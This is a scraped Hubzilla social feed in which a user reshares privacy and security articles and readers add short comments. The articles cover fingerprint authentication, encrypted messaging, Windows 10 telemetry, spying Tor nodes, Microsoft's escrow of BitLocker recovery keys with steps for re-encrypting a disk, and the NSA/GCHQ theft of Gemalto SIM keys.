cover photo

Seth Martin

seth@lastauth.com

Seth Martin
  last edited: Fri, 21 Apr 2017 18:02:48 -0500  
Once more, with passion: Fingerprints suck as passwords

Biometric data is identity (public), never authentication (secret). You leave a copy of your fingerprints literally on everything you touch.


#Privacy #Security #Passwords #Cybersecurity #Biometrics @Gadget Gurus+ @LibertyPod+
cb7f604332cf39
  
So while it's easy to update your password or get a new credit card number, you can't get a new finger.

https://www.schneier.com/blog/archives/2015/10/stealing_finger.html

and 10 years ago CCC showed how to fake a fingerprint with superglue and wood glue easily:
https://www.youtube.com/watch?v=OPtzRQNHzl0 sorry video is in german.
prep
  
But (!) fingerprints work well in allowing security agencies to track you around.

I believe That is the reason for the push for bio-metrics and fingerprint scanners, in particular.

I have doubt in most security things; originating from Facebook, Apple, Google or Microsoft.

Seth Martin
  
The Internet Health Report

Image/photo


Welcome to Mozilla’s new open source initiative to document and explain what’s happening to the health of the Internet. Combining research from multiple sources, we collect data on five key topics and offer a brief overview of each.


#Decentralization #Privacy #Internet #Security #Cybersecurity #Mozilla @LibertyPod+ @Gadget Guru+

Seth Martin
  
DeeplinksDeeplinks wrote the following post Thu, 29 Dec 2016 18:10:08 -0600

Secure Messaging Takes Some Steps Forward, Some Steps Back: 2016 In Review

This year has been full of developments in messaging platforms that employ encryption to protect users. 2016 saw an increase in the level of security for some major messaging services, bringing end-to-end encryption to over a billion people. Unfortunately, we’ve also seen major platforms making poor decisions for users and potentially undermining the strong cryptography built into their apps.

WhatsApp makes big improvements, but concerning privacy changes
In late March, the Facebook-owned messaging service WhatsApp introduced end-to-end encryption for its over 1 billion monthly active users.  The enormous significance of rolling out strong encryption to such a large user-base was combined with the fact that underlying Whatsapp’s new feature was the Signal Protocol, a well-regarded and independently reviewed encryption protocol. WhatsApp was not only protecting users’ chats, but also doing so with one of the best end-to-end encrypted messaging protocols out there. At the time, we praised WhatsApp and created a guide for both iOS and Android on how you could protect your communications using it.

In August, however, we were alarmed to see WhatsApp establish data-sharing practices that signaled a shift in its attitude toward user privacy. In its first privacy policy change since 2012, WhatsApp laid the groundwork for expanded data-sharing with its parent company, Facebook. This change allows Facebook access to several pieces of users’ WhatsApp information, including WhatsApp phone number, contact list, and usage data (e.g. when a user last used WhatsApp, what device it was used it on, and what OS it was run on). This new data-sharing compounded our previous concerns about some of WhatsApp’s non-privacy-friendly default settings.

Signal takes steps forward
Meanwhile, the well-regarded end-to-end encryption app Signal, for which the Signal Protocol was created, has grown its user-base and introduced new features.  Available for iOS and Android (as well as desktop if you have either of the previous two), Signal recently introduced disappearing messages to its platform.  With this, users can be assured that after a chosen amount of time, messages will be deleted from both their own and their contact’s devices.

Signal also recently changed the way users verify their communications, introducing the concept of “safety numbers” to authenticate conversations and verify the long-lived keys of contacts in a more streamlined way.

Mixed-mode messaging
2016  reminded us that it’s not as black-and-white as secure messaging apps vs. not-secure ones. This year we saw several existing players in the messaging space add end-to-end encrypted options to their platforms. Facebook Messenger added “secret” messaging, and Google released Allo Messenger with “incognito” mode. These end-to-end encrypted options co-exist on the apps with a default option that is only encrypted in transit.

Unfortunately, this “mixed mode” design may do more harm than good by teaching users the wrong lessons about encryption. Branding end-to-end encryption as “secret,” “incognito,” or “private” may encourage users to use end-to-end encryption only when they are doing something shady or embarrassing. And if end-to-end encryption is a feature that you only use when you want to hide or protect something, then the simple act of using it functions as a red flag for valuable, sensitive information. Instead, encryption should be an automatic, straightforward, easy-to-use status quo to protect all communications.

Further, mixing end-to-end encrypted modes with less sensitive defaults has been demonstrated to result in users making mistakes and inadvertently sending sensitive messages without end-to-end encryption.

In contrast, the end-to-end encrypted “letter sealing” that LINE expanded this year is enabled by default. Since first introducing it for 1-on-1 chats in 2015, LINE has made end-to-end encryption the default and progressively expanded the feature to group chats and 1-on-1 calls. Users can still send messages on LINE without end-to-end encryption by changing security settings, but the company recommends leaving the default “letter sealing” enabled at all times. This kind of default design makes it easier for users to communicate with encryption from the get-go, and much more difficult for them to make dangerous mistakes.

The dangers of unsecure messaging
In stark contrast to the above-mentioned secure messaging apps, a November report from Citizen Lab exposes China’s WeChat messenger’s practice of performing selective censorship on its over 806 million monthly active users.  When a user registers with a Chinese phone number, WeChat will censor content critical of the regime no matter where that user is. The censorship effectively “follows them around,” even if the user switches to an international phone number or leaves China to travel abroad. Effectively, WeChat users may be under the control of China’s censorship regime no matter where they go.

Compared to the secure messaging practices EFF advocates for, WeChat represents the other end of the messaging spectrum, employing algorithms to control and limit access rather than using privacy-enhancing technologies to allow communication. This is an urgent reminder of how users can be put in danger when their communications are available to platform providers and governments, and why it is so important to continue promoting privacy-enhancing technologies and secure messaging.

This article is part of our Year In Review series. Read other articles about the fight for digital rights in 2016.

Like what you're reading? Support digital freedom defense today!
Image/photo

Share this: Image/photo Image/photo Image/photo Image/photo Join EFF


#Encryption #Privacy #Communications #Messaging #Security #WhatsApp #Signal #LINE #Allo #incognito  
@Gadget Guru+ @LibertyPod+
Mike Macgirvin
  
I tend to disagree about mixed mode messaging. We need a range of communication tools, from hush-hush ultra top secret to public and open. Both ends of the spectrum have problems. That's why you need privacy.
Seth Martin
  last edited: Mon, 02 Jan 2017 10:46:52 -0600  
I agree with you, Mike. I just think it's important for these messaging apps to have encryption on by default to curb authorities targeting those that use the feature selectively.
Fabián Bonetti
 
Mike por que debo salir de mi serviddor para responderte?

Seth Martin
  
DeeplinksDeeplinks wrote the following post Wed, 17 Aug 2016 09:12:52 -0500

With Windows 10, Microsoft Blatantly Disregards User Choice and Privacy: A Deep Dive

Image/photo


Microsoft had an ambitious goal with the launch of Windows 10: a billion devices running the software by the end of 2018. In its quest to reach that goal, the company aggressively pushed Windows 10 on its users and went so far as to offer free upgrades for a whole year. However, the company’s strategy for user adoption has trampled on essential aspects of modern computing: user choice and privacy. We think that’s wrong.

You don’t need to search long to come across stories of people who are horrified and amazed at just how far Microsoft has gone in order to increase Windows 10’s install base. Sure, there is some misinformation and hyperbole, but there are also some real concerns that current and future users of Windows 10 should be aware of. As the company is currently rolling out its “Anniversary Update” to Windows 10, we think it’s an appropriate time to focus on and examine the company’s strategy behind deploying Windows 10.

Disregarding User Choice

The tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious. Some highlights: Microsoft installed an app in users’ system trays advertising the free upgrade to Windows 10. The app couldn’t be easily hidden or removed, but some enterprising users figured out a way. Then, the company kept changing the app and bundling it into various security patches, creating a cat-and-mouse game to uninstall it.

Eventually, Microsoft started pushing Windows 10 via its Windows Update system. It started off by pre-selecting the download for users and downloading it on their machines. Not satisfied, the company eventually made Windows 10 a recommended update so users receiving critical security updates were now also downloading an entirely new operating system onto their machines without their knowledge. Microsoft even rolled in the Windows 10 ad as part of an Internet Explorer security patch. Suffice to say, this is not the standard when it comes to security updates, and isn’t how most users expect them to work. When installing security updates, users expect to patch their existing operating system, and not see an advertisement or find out that they have downloaded an entirely new operating system in the process.

In May 2016, in an action designed in a way we think was highly deceptive, Microsoft actually changed the expected behavior of a dialog window, a user interface element that’s been around and acted the same way since the birth of the modern desktop. Specifically, when prompted with a Windows 10 update, if the user chose to decline it by hitting the ‘X’ in the upper right hand corner, Microsoft interpreted that as consent to download Windows 10.

Time after time, with each update, Microsoft chose to employ questionable tactics to cause users to download a piece of software that many didn’t want. What users actually wanted didn’t seem to matter. In an extreme case, members of a wildlife conservation group in the African jungle felt that the automatic download of Windows 10 on a limited bandwidth connection could have endangered their lives if a forced upgrade had begun during a mission.

Disregarding User Privacy

The trouble with Windows 10 doesn’t end with forcing users to download the operating system. By default, Windows 10 sends an unprecedented amount of usage data back to Microsoft, and the company claims most of it is to “personalize” the software by feeding it to the OS assistant called Cortana. Here’s a non-exhaustive list of data sent back: location data, text input, voice input, touch input, webpages you visit, and telemetry data regarding your general usage of your computer, including which programs you run and for how long.

While we understand that many users find features like Cortana useful, and that such features would be difficult (though not necessarily impossible) to implement in a way that doesn’t send data back to the cloud, the fact remains that many users would much prefer to opt out of these features in exchange for maintaining their privacy.

And while users can opt-out of some of these settings, it is not a guarantee that your computer will stop talking to Microsoft’s servers. A significant issue is the telemetry data the company receives. While Microsoft insists that it aggregates and anonymizes this data, it hasn’t explained just how it does so. Microsoft also won’t say how long this data is retained, instead providing only general timeframes. Worse yet, unless you’re an enterprise user, no matter what, you have to share at least some of this telemetry data with Microsoft and there’s no way to opt-out of it.

Microsoft has tried to explain this lack of choice by saying that Windows Update won’t function properly on copies of the operating system with telemetry reporting turned to its lowest level. In other words, Microsoft is claiming that giving ordinary users more privacy by letting them turn telemetry reporting down to its lowest level would risk their security since they would no longer get security updates1. (Notably, this is not something many articles about Windows 10 have touched on.)

But this is a false choice that is entirely of Microsoft’s own creation. There’s no good reason why the types of data Microsoft collects at each telemetry level couldn’t be adjusted so that even at the lowest level of telemetry collection, users could still benefit from Windows Update and secure their machines from vulnerabilities, without having to send back things like app usage data or unique IDs like an IMEI number.

And if this wasn’t bad enough, Microsoft’s questionable upgrade tactics of bundling Windows 10 into various levels of security updates have also managed to lower users’ trust in the necessity of security updates. Sadly, this has led some people to forego security updates entirely, meaning that there are users whose machines are at risk of being attacked.

There’s no doubt that Windows 10 has some great security improvements over previous versions of the operating system. But it’s a shame that Microsoft made users choose between having privacy and security.

The Way Forward

Microsoft should come clean with its user community. The company needs to acknowledge its missteps and offer real, meaningful opt-outs to the users who want them, preferably in a single unified screen. It also needs to be straightforward in separating security updates from operating system upgrades going forward, and not try to bypass user choice and privacy expectations.

Otherwise it will face backlash in the form of individual lawsuits, state attorney general investigations, and government investigations.

We at EFF have heard from many users who have asked us to take action, and we urge Microsoft to listen to these concerns and incorporate this feedback into the next release of its operating system. Otherwise, Microsoft may find that it has inadvertently discovered just how far it can push its users before they abandon a once-trusted company for a better, more privacy-protective solution.
  • 1. Confusingly, Microsoft calls the lowest level of telemetry reporting (which is not available on Home or Professional editions of Windows 10) the “security” level—even though it prevents security patches from being delivered via Windows Update.
Share this: Image/photo Image/photo Image/photo Image/photo Join EFF


#Privacy #Security #Microsoft #Windows #Cybersecurity @Gadget Guru+ @LibertyPod+
kris
  
My main OS at home is kubuntu.

Seth Martin
  last edited: Sat, 21 Jan 2017 11:49:04 -0600  
Suspicion Confirmed.

Schneier on SecuritySchneier on Security wrote the following post Fri, 08 Jul 2016 07:01:18 -0500

Researchers Discover Tor Nodes Designed to Spy on Hidden Services

Two researchers have discovered over 100 Tor nodes that are spying on hidden services. Cory Doctorow explains:
These nodes -- ordinary nodes, not exit nodes -- sorted through all the traffic that passed through them, looking for anything bound for a hidden service, which allowed them to discover hidden services that had not been advertised. These nodes then attacked the hidden services by making connections to them and trying common exploits against the server-software running on them, seeking to compromise and take them over.

The researchers used "honeypot" .onion servers to find the spying computers: these honeypots were .onion sites that the researchers set up in their own lab and then connected to repeatedly over the Tor network, thus seeding many Tor nodes with the information of the honions' existence. They didn't advertise the honions' existence in any other way and there was nothing of interest at these sites, and so when the sites logged new connections, the researchers could infer that they were being contacted by a system that had spied on one of their Tor network circuits.

This attack was already understood as a theoretical problem for the Tor project, which had recently undertaken a rearchitecting of the hidden service system that would prevent it from taking place.

No one knows who is running the spying nodes: they could be run by criminals, governments, private suppliers of "infowar" weapons to governments, independent researchers, or other scholars (though scholarly research would not normally include attempts to hack the servers once they were discovered).

The Tor project is working on redesigning its system to block this attack.

Vice Motherboard article. Defcon talk announcement.


#Tor #Security #Cybersecurity #Spying #Surveillance @LibertyPod+  @Gadget Guru+
KrisLibertyPod
  
That is very sad news to hear. I'm a free software advocate, that is “free” as in freedom. I very much enjoyed going to libertypod.org in order use social media in a system that I knew respected my freedom. You facilitated a way for me and others to use a network run by volunteers and members of our community. You and others actually cared about free speech and refused to allow all social life on the Internet to be turned into a commodity bought and sold from one master to another. You were not interested in impressing shareholders and you were not interested in the surveillance of your users for money. Instead you were interested in an alternative way we could share ideas outside the control and risk of centralized censorship systems. You were interested in fighting the horrors of the tech society that is being created without privacy and freedom in it. I saw things I was sure Facebook administrators would have deleted and I rejoiced in the fact we were so free that these things were not censored at a whim. I am grateful to have been a part of this great community, made to increase the control of users over social networks. While I am unsure if I will join another pod, use another network like gnusocial or something else I still wanted to thank you Seth, for all the work that you have done to make this possible.
Vecchio Giac
  last edited: Tue, 19 Jul 2016 09:02:13 -0500  
Kris, if you like also open source  and not just free Stallman software , Hubzilla is a fantastic option, a wonderful tool, much different from diaspora gnusocial  etc ...
Seth Martin
  
Kris, while you're here at lastauth.com, a Hubzilla website, try visiting https://lastauth.com/settings/featured and enable the diaspora protocol so you can communicate with people on diaspora pods. We also have a GNUsocial federation plugin as well. Give it a try, see what you think.

Seth Martin
  last edited: Sun, 03 Jan 2016 10:27:02 -0600  
The InterceptThe Intercept wrote the following post Mon, 28 Dec 2015 08:57:30 -0600

Recently Bought a Windows Computer? Microsoft Probably Has Your Encryption Key

Image/photo



One of the excellent features of new Windows devices is that disk encryption is built-in and turned on by default, protecting your data in case your device is lost or stolen. But what is less well-known is that, if you are like most users and login to Windows 10 using your Microsoft account, your computer automatically uploaded a copy of your recovery key – which can be used to unlock your encrypted disk – to Microsoft’s servers, probably without your knowledge and without an option to opt-out.

During the “crypto wars” of the nineties, the National Security Agency developed an encryption backdoor technology – endorsed and promoted by the Clinton administration – called the Clipper chip, which they hoped telecom companies would use to sell backdoored crypto phones. Essentially, every phone with a Clipper chip would come with an encryption key, but the government would also get a copy of that key – this is known as key escrow – with the promise to only use it in response to a valid warrant. But due to public outcry and the availability of encryption tools like PGP, which the government didn’t control, the Clipper chip program ceased to be relevant by 1996. (Today, most phone calls still aren’t encrypted. You can use the free, open source, backdoorless Signal app to make encrypted calls.)

The fact that new Windows devices require users to backup their recovery key on Microsoft’s servers is remarkably similar to a key escrow system, but with an important difference. Users can choose to delete recovery keys from their Microsoft accounts (you can skip to the bottom of this article to learn how) – something that people never had the option to do with the Clipper chip system. But they can only delete it after they’ve already uploaded it to the cloud.

“The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well,” says Matthew Green, professor of cryptography at Johns Hopkins University. “There are certainly cases where it’s helpful to have a backup of your key or password. In those cases you might opt in to have a company store that information. But handing your keys to a company like Microsoft fundamentally changes the security properties of a disk encryption system.”

As soon as your recovery key leaves your computer, you have no way of knowing its fate. A hacker could have already hacked your Microsoft account and can make a copy of your recovery key before you have time to delete it. Or Microsoft itself could get hacked, or could have hired a rogue employee with access to user data. Or a law enforcement or spy agency could send Microsoft a request for all data in your account, which would legally compel them to hand over your recovery key, which they could do even if the first thing you do after setting up your computer is delete it.

As Green puts it, “Your computer is now only as secure as that database of keys held my Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.”

Of course, keeping a backup of your recovery key in your Microsoft account is genuinely useful for probably the majority of Windows users, which is why Microsoft designed the encryption scheme, known as “device encryption,” this way. If something goes wrong and your encrypted Windows computer breaks, you’re going to need this recovery key to gain access to any of your files. Microsoft would rather give their customers crippled disk encryption than risk their data.

“When a device goes into recovery mode and the user doesn’t have access to the recovery key the data on the drive will become permanently inaccessible. Based on the possibility of this outcome and a broad survey of customer feedback we chose to automatically backup the user recovery key,” a Microsoft spokesperson told me. “The recovery key requires physical access to the user device and is not useful without it.”

After you finish setting up your Windows computer, you can login to your Microsoft account and delete the recovery key. Is this secure enough? “If Microsoft doesn’t keep backups, maybe,” says Green. “But it’s hard to guarantee that. And for people who aren’t aware of the risk, opt-out seems risky.”

This policy is in stark contract to Microsoft’s major competitor, Apple. New Macs also ship with built-in and default disk encryption: a technology known as FileVault. Like Microsoft, Apple lets you store a backup of your recovery key in your iCloud account. But in Apple’s case, it’s an option. When you set up a Mac for the first time, you can uncheck a box if you don’t want to send your key to Apple’s servers.

This policy is also in contrast to Microsoft’s premium disk encryption product called BitLocker, which isn’t the same thing as what Microsoft refers to as device encryption. When you turn on BitLocker you’re forced to make a backup of your recovery key, but you get three options: Save it in your Microsoft account, save it to a USB stick, or print it.

To fully understand the different disk encryption features that Windows offers, you need to know some Microsoft jargon. Windows comes in different editions: Home (the cheapest), Pro, and Enterprise (more expensive). Windows Home includes device encryption, which started to become available during Windows 8, and requires your computer to have a tamper-resistant chip that stores encryption keys, something all new PCs come with. Pro and Enterprise both include device encryption, and they also include BitLocker, which started to become available during Windows Vista, but only for the premium editions. Under the hood, device encryption and BitLocker are the same thing. The difference is there’s only one way to use device encryption, but BitLocker is configurable.

If you’re using a recent version of Windows, and your computer has the encryption chip, and if you have a Microsoft account, your disk will automatically get encrypted, and your recovery key will get sent to Microsoft. If you login to Windows using your company’s or university’s Windows domain, then your recovery key will get sent to a server controlled by your company or university instead of Microsoft – but still, you can’t prevent device encryption from sending your recovery key at all. If you choose to not use a Microsoft or a domain account at all and instead create a “local only” account, then you don’t get disk encryption.

BitLocker, on the other hand, gives you more control. When you turn on BitLocker you get the choice to store your recovery key locally, among other options. But if you buy a new Windows device, even if it supports BitLocker, you’ll be using device encryption when you first set it up, and you’ll automatically send your recovery key to Microsoft.

In short, there is no way to prevent a new Windows device from uploading your recovery key the first time you login to your Microsoft account, even if you have a Pro or Enterprise edition of Windows. And this is worse than just Microsoft choosing an insecure default option. Windows Home users don’t get the choice to not upload their recovery key at all. And while Windows Pro and Enterprise users do get the choice (because they can use BitLocker), they can’t exercise that choice until after they’ve already uploaded their recovery key to Microsoft’s servers.

How to delete your recovery key from your Microsoft account
Go to this website and login to your Microsoft account – this will be the same username and password that you use to login to your Windows device. Once you’re in, it will show you a list of recovery keys backed up to your account.

If any of your Windows devices are listed, this means that Microsoft, or anyone that manages to access data in your Microsoft account, is technically able to unlock your encrypted disk, without your consent, as long as they physically have your computer. You can go ahead and delete your recovery key on this page – but you may want to back it up locally first, for example by writing it down on a piece of paper that you keep somewhere safe.

If you don’t see any recovery keys, then you either don’t have an encrypted disk, or Microsoft doesn’t have a copy of your recovery key. This might be the case if you’re using BitLocker and didn’t upload your recovery key when you first turned it on.

When you delete your recovery key from your account on this website, Microsoft promises that it gets deleted immediately, and that copies stored on their backup drives get deleted shortly thereafter as well. “The recovery key password is deleted right away from the customer’s online profile. As the drives that are used for failover and backup are sync’d up with the latest data the keys are removed,” a Microsoft spokesperson assured me.

If you have sensitive data that’s stored on your laptop, in some cases it might be safer to completely stop using your old encryption key and generate a new one that you never send to Microsoft. This way you can be entirely sure that the copy that used to be on Microsoft’s server hasn’t already been compromised.

Generate a new encryption key without giving a copy to Microsoft
In order to generate a new disk encryption key, this time without giving a copy to Microsoft, you need decrypt your whole hard disk and then re-encrypt it, but this time in such a way that you’ll actually get asked how you want to backup your recover key.

This is only possible if you have Windows Pro or Enterprise. Unfortunately, the only thing you can do if you have the Home edition is upgrade to a more expensive edition or use non-Microsoft disk encryption software, such as BestCrypt, which you have to pay for. You may also be able to get open source encryption software like VeraCrypt working, but sadly the open source options for full disk encryption in Windows don’t currently work well with modern PC hardware (as touched on here).

Go to Start, type “bitlocker”, and click “Manage BitLocker” to open BitLocker Drive Encryption settings.

Image/photo

From here, click “Turn off BitLocker”. It will warn you that your disk will get decrypted and that it may take some time. Go ahead and continue. You can use your computer while it’s decrypting.

Image/photo

After your disk is finished decrypting, you need to turn BitLocker back on. Back in the BitLocker Drive Encryption settings, click “Turn on BitLocker”.

Image/photo

It will check to see if your computer supports BitLocker, and then it will ask you how you want to backup your recovery key. It sure would be nice if it asked you this when you first set up your computer.

Image/photo

If you choose to save it to a file, it will make you save it onto a disk that you’re not currently encrypting, such as a USB stick. Or you can choose to print it, and keep a hard copy. You must choose one of them to continue, but make sure you don’t choose “Save to your Microsoft account.”

On the next page it will ask you if you want to encrypt used disk space only (faster) or encrypt your entire disk including empty space (slower). If you want to be on the safe side, choose the latter. Then on the next page it will ask you if you wish to run the BitLocker system check, which you should probably do.

Finally, it will make you reboot your computer.

When you boot back up your hard disk will be encrypting in the background. At this point you can check your Microsoft account again to see if Windows uploaded your recovery key – it shouldn’t have.

Image/photo

Now just wait for your disk to finish encrypting. Congratulations: Your disk is encrypted and Microsoft no longer has the ability to unlock it.

The post Recently Bought a Windows Computer? Microsoft Probably Has Your Encryption Key appeared first on The Intercept.


#Microsoft #Windows #Key Escrow #Encryption #Clipper Chip #Security @Gadget Guru+
Marshall Sutherland
  
When I upgraded some computers to Win10 for someone the other day, I have a vague recollection of being asked for a Microsoft account, but not having one, I must have cancelled out of that.

Seth Martin
  
The InterceptThe Intercept wrote the following post Thu, 19 Feb 2015 13:25:38 -0600
How Spies Stole the Keys to the Encryption Castle

AMERICAN AND BRITISH spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

With these stolen encryption keys, intelligence agencies can monitor mobile communications without seeking or receiving approval from telecom companies and foreign governments. Possessing the keys also sidesteps the need to get a warrant or a wiretap, while leaving no trace on the wireless provider’s network that the communications were intercepted. Bulk key theft additionally enables the intelligence agencies to unlock any previously encrypted communications they had already intercepted, but did not yet have the ability to decrypt.

As part of the covert operations against Gemalto, spies from GCHQ — with support from the NSA — mined the private communications of unwitting engineers and other company employees in multiple countries.

Gemalto was totally oblivious to the penetration of its systems — and the spying on its employees. “I’m disturbed, quite concerned that this has happened,” Paul Beverly, a Gemalto executive vice president, told The Intercept. “The most important thing for me is to understand exactly how this was done, so we can take every measure to ensure that it doesn’t happen again, and also to make sure that there’s no impact on the telecom operators that we have served in a very trusted manner for many years. What I want to understand is what sort of ramifications it has, or could have, on any of our customers.” He added that “the most important thing for us now is to understand the degree” of the breach.

Leading privacy advocates and security experts say that the theft of encryption keys from major wireless network providers is tantamount to a thief obtaining the master ring of a building superintendent who holds the keys to every apartment. “Once you have the keys, decrypting traffic is trivial,” says Christopher Soghoian, the principal technologist for the American Civil Liberties Union. “The news of this key theft will send a shock wave through the security community.”

The massive key theft is “bad news for phone security. Really bad news.”


Beverly said that after being contacted by The Intercept, Gemalto’s internal security team began on Wednesday to investigate how their system was penetrated and could find no trace of the hacks. When asked if the NSA or GCHQ had ever requested access to Gemalto-manufactured encryption keys, Beverly said, “I am totally unaware. To the best of my knowledge, no.”

According to one secret GCHQ slide, the British intelligence agency penetrated Gemalto’s internal networks, planting malware on several computers, giving GCHQ secret access. We “believe we have their entire network,” the slide’s author boasted about the operation against Gemalto.

Additionally, the spy agency targeted unnamed cellular companies’ core networks, giving it access to “sales staff machines for customer information and network engineers machines for network maps.” GCHQ also claimed the ability to manipulate the billing servers of cell companies to “suppress” charges in an effort to conceal the spy agency’s secret actions against an individual’s phone. Most significantly, GCHQ also penetrated “authentication servers,” allowing it to decrypt data and voice communications between a targeted individual’s phone and their telecom provider’s network. A note accompanying the slide asserted that the spy agency was “very happy with the data so far and [was] working through the vast quantity of product.”

The Mobile Handset Exploitation Team (MHET), whose existence has never before been disclosed, was formed in April 2010 to target vulnerabilities in cell phones. One of its main missions was to covertly penetrate computer networks of corporations that manufacture SIM cards, as well as those of wireless network providers. The team included operatives from both GCHQ and the NSA.

While the FBI and other U.S. agencies can obtain court orders compelling U.S.-based telecom companies to allow them to wiretap or intercept the communications of their customers, on the international front this type of data collection is much more challenging. Unless a foreign telecom or foreign government grants access to their citizens’ data to a U.S. intelligence agency, the NSA or CIA would have to hack into the network or specifically target the user’s device for a more risky “active” form of surveillance that could be detected by sophisticated targets. Moreover, foreign intelligence agencies would not allow U.S. or U.K. spy agencies access to the mobile communications of their heads of state or other government officials.

“It’s unbelievable. Unbelievable,” said Gerard Schouw, a member of the Dutch Parliament when told of the spy agencies’ actions. Schouw, the intelligence spokesperson for D66, the largest opposition party in the Netherlands, told The Intercept, “We don’t want to have the secret services from other countries doing things like this.” Schouw added that he and other lawmakers will ask the Dutch government to provide an official explanation and to clarify whether the country’s intelligence services were aware of the targeting of Gemalto, whose official headquarters is in Amsterdam.

Last November, the Dutch government amended its constitution to include explicit protection for the privacy of digital communications, including those made on mobile devices. “We have, in the Netherlands, a law on the [activities] of secret services. And hacking is not allowed,” he said. Under Dutch law, the interior minister would have to sign off on such operations by foreign governments’ intelligence agencies. “I don’t believe that he has given his permission for these kind of actions.”

The U.S. and British intelligence agencies pulled off the encryption key heist in great stealth, giving them the ability to intercept and decrypt communications without alerting the wireless network provider, the foreign government or the individual user that they have been targeted. “Gaining access to a database of keys is pretty much game over for cellular encryption,” says Matthew Green, a cryptography specialist at the Johns Hopkins Information Security Institute. The massive key theft is “bad news for phone security. Really bad news.”

Image/photo



AS CONSUMERS BEGAN to adopt cellular phones en masse in the mid-1990s, there were no effective privacy protections in place. Anyone could buy a cheap device from RadioShack capable of intercepting calls placed on mobile phones. The shift from analog to digital networks introduced basic encryption technology, though it was still crackable by tech savvy computer science graduate students, as well as the FBI and other law enforcement agencies, using readily available equipment.

Today, second-generation (2G) phone technology, which relies on a deeply flawed encryption system, remains the dominant platform globally, though U.S. and European cell phone companies now use 3G, 4G and LTE technology in urban areas. These include more secure, though not invincible, methods of encryption, and wireless carriers throughout the world are upgrading their networks to use these newer technologies.

It is in the context of such growing technical challenges to data collection that intelligence agencies, such as the NSA, have become interested in acquiring cellular encryption keys. “With old-fashioned [2G], there are other ways to work around cellphone security without those keys,” says Green, the Johns Hopkins cryptographer. “With newer 3G, 4G and LTE protocols, however, the algorithms aren’t as vulnerable, so getting those keys would be essential.”

The privacy of all mobile communications — voice calls, text messages and internet access — depends on an encrypted connection between the cell phone and the wireless carrier’s network, using keys stored on the SIM, a tiny chip smaller than a postage stamp which is inserted into the phone. All mobile communications on the phone depend on the SIM, which stores and guards the encryption keys created by companies like Gemalto. SIM cards can be used to store contacts, text messages, and other important data, like one’s phone number. In some countries, SIM cards are used to transfer money. As The Intercept reported last year, having the wrong SIM card can make you the target of a drone strike.

SIM cards were not invented to protect individual communications — they were designed to do something much simpler: ensure proper billing and prevent fraud, which was pervasive in the early days of cell phones. Soghoian compares the use of encryption keys on SIM cards to the way Social Security numbers are used today. “Social security numbers were designed in the 1930s to track your contributions to your government pension,” he says. “Today they are used as a quasi national identity number, which was never their intended purpose.”

Because the SIM card wasn’t created with call confidentiality in mind, the manufacturers and wireless carriers don’t make a great effort to secure their supply chain. As a result, the SIM card is an extremely vulnerable component of a mobile phone. “I doubt anyone is treating those things very carefully,” says Green. “Cell companies probably don’t treat them as essential security tokens. They probably just care that nobody is defrauding their networks.” The ACLU’s Soghoian adds, “These keys are so valuable that it makes sense for intel agencies to go after them.”

As a general rule, phone companies do not manufacture SIM cards, nor program them with secret encryption keys. It is cheaper and more efficient for them to outsource this sensitive step in the SIM card production process. They purchase them in bulk with the keys pre-loaded by other corporations. Gemalto is the largest of these SIM “personalization” companies.

After a SIM card is manufactured, the encryption key, known as a “Ki,” is burned directly onto the chip. A copy of the key is also given to the cellular provider, allowing its network to recognize an individual’s phone. In order for the phone to be able to connect to the wireless carriers’ network, the phone — with the help of the SIM — authenticates itself using the Ki that has been programmed onto the SIM. The phone conducts a secret “handshake” that validates that the Ki on the SIM matches the Ki held by the mobile company. Once that happens, the communications between the phone and the network are encrypted. Even if GCHQ or the NSA were to intercept the phone signals as they are transmitted through the air, the intercepted data would be a garbled mess. Decrypting it can be challenging and time-consuming. Stealing the keys, on the other hand, is beautifully simple, from the intelligence agencies’ point of view, as the pipeline for producing and distributing SIM cards was never designed to thwart mass surveillance efforts.

One of the creators of the encryption protocol that is widely used today for securing emails, Adi Shamir, famously asserted: “Cryptography is typically bypassed, not penetrated.” In other words, it is much easier (and sneakier) to open a locked door when you have the key than it is to break down the door using brute force. While the NSA and GCHQ have substantial resources dedicated to breaking encryption, it is not the only way — and certainly not always the most efficient — to get at the data they want. “NSA has more mathematicians on its payroll than any other entity in the U.S.,” says the ACLU’s Soghoian. “But the NSA’s hackers are way busier than its mathematicians.”

GCHQ and the NSA could have taken any number of routes to steal SIM encryption keys and other data. They could have physically broken into a manufacturing plant. They could have broken into a wireless carrier’s office. They could have bribed, blackmailed or coerced an employee of the manufacturer or cell phone provider. But all of that comes with substantial risk of exposure. In the case of Gemalto, hackers working for GCHQ remotely penetrated the company’s computer network in order to steal the keys in bulk as they were en route to the wireless network providers.

SIM card “personalization” companies like Gemalto ship hundreds of thousands of SIM cards at a time to mobile phone operators across the world. International shipping records obtained by The Intercept show that in 2011, Gemalto shipped 450,000 smart cards from its plant in Mexico to Germany’s Deutsche Telekom in just one shipment.

In order for the cards to work and for the phones’ communications to be secure, Gemalto also needs to provide the mobile company with a file containing the encryption keys for each of the new SIM cards. These master key files could be shipped via FedEx, DHL, UPS or another snail mail provider. More commonly, they could be sent via email or through File Transfer Protocol, FTP, a method of sending files over the internet.

The moment the master key set is generated by Gemalto or another personalization company, but before it is sent to the wireless carrier, is the most vulnerable moment for interception. “The value of getting them at the point of manufacture is you can presumably get a lot of keys in one go, since SIM chips get made in big batches,” says Green, the cryptographer. “SIM cards get made for lots of different carriers in one facility.” In Gemalto’s case, GCHQ hit the jackpot, as the company manufactures SIMs for hundreds of wireless network providers, including all of the leading U.S. — and many of the largest European — companies.

